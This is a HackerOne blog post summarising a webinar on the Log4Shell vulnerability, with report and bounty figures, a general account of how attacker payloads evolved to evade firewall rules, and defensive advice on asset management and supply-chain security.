HackerOne

Log4Shell: Attack Evolution

Log4J webinar with Chris Evans and Jobert Abma

For many security teams, the holiday season was spoiled by the challenging remediation of Log4Shell. The affected Log4j software is ubiquitous in web applications, making this one of the most widespread vulnerabilities of all time.

HackerOne has unique visibility into the global response to Log4Shell, seeing in real time how organizations responded and remediated. Last week HackerOne’s CISO Chris Evans and Co-founder Jobert Abma shared findings from our platform

Below is a summary of their presentation and key insights from HackerOne’s platform data.

 

Submission Volume and Rewards

Hackers have submitted over 2,000 Log4Shell reports to over 400 of our customers. The majority of reports were made in the first 14 days after the public disclosure of Log4Shell. Since then submissions have decreased significantly, suggesting the immediate disruption from Log4Shell is waning. However, we caution against assuming the threat is gone. Given the ubiquity of Log4j, we expect vulnerabilities will continue to be discovered and exploited across 2022.

As of today, a total of $607,000 in bounties have been awarded on the HackerOne platform for Log4Shell vulnerabilities. Of that total, $78,000 were bonuses specifically offered by customer programs for Log4Shell. 

Real-world impact

Log4Shell is a critical vulnerability and has been given a CVSS 10.0, the highest possible base score

Based on reports received by our customers, the real-world threat of Log4Shell matches that score. Once triaged, 75% of submissions retained a 10.0 rating. The remaining 25% of reports were downgraded in severity due to environmental factors.

Adaptability of Hackers

The severity of Log4Shell, combined with Log4j’s ubiquity, meant that attackers were motivated to quickly exploit this vulnerability.

It’s common to see attackers sharing exploits and payloads on forums and other criminal communities. This allows attackers to quickly start exploitation, and by essentially enabling any attacker to copy-paste an exploit, lowers the required skill. As attackers gain familiarity and experience with a vulnerability, their attacks improve.

We saw that the initial payloads being used were very simple. In response to widespread probing and attacks, CDNs and large organizations deployed rules to their web application firewalls to identify and block these simple payloads. 

Attacks quickly evolved to avoid these rules - adding data exfiltration, using uncommon ports, and other clever adaptations. By December 20th, 90% of payloads had evolved in complexity to evade blocks, creating a cat-and-mouse game.

Your defenses cannot be static - they too must evolve along with attacks. Keeping up with the global criminal community is a challenge for any individual security team. A unique advantage of using the crowdsourced ethical hacking community is that you can leverage the same ingenuity and speed for your defenses. 

Asset Management 

Asset management is a foundational part of a mature security posture and is often the starting point for incident response. However, visibility alone is not sufficient. 

After HackerOne completed our internal remediation process, we offered a $25,000 bonus for Log4Shell reports through our own bug bounty program. Our offering was fruitful, resulting in a confirmed report which found a payload could be exploited in one of our third-party cloud providers.

Security your entire supply chain requires multiple layers of defense. Scanning tools are a good starting point, allowing you to fingerprint vulnerable software across your infrastructure - including dependencies and third-party network infrastructure. In cases where you can not directly investigate your supply chain components, contact those vendors to verify they are remediating. We also recommend offering bonuses through your bug bounty program as an incentive in order to improve confidence that your remediation was successful. 

Watch the full presentation by Chris Evans and Jobert Abma

The 7th Annual Hacker-Powered Security Report

Hacker-Powered Security Report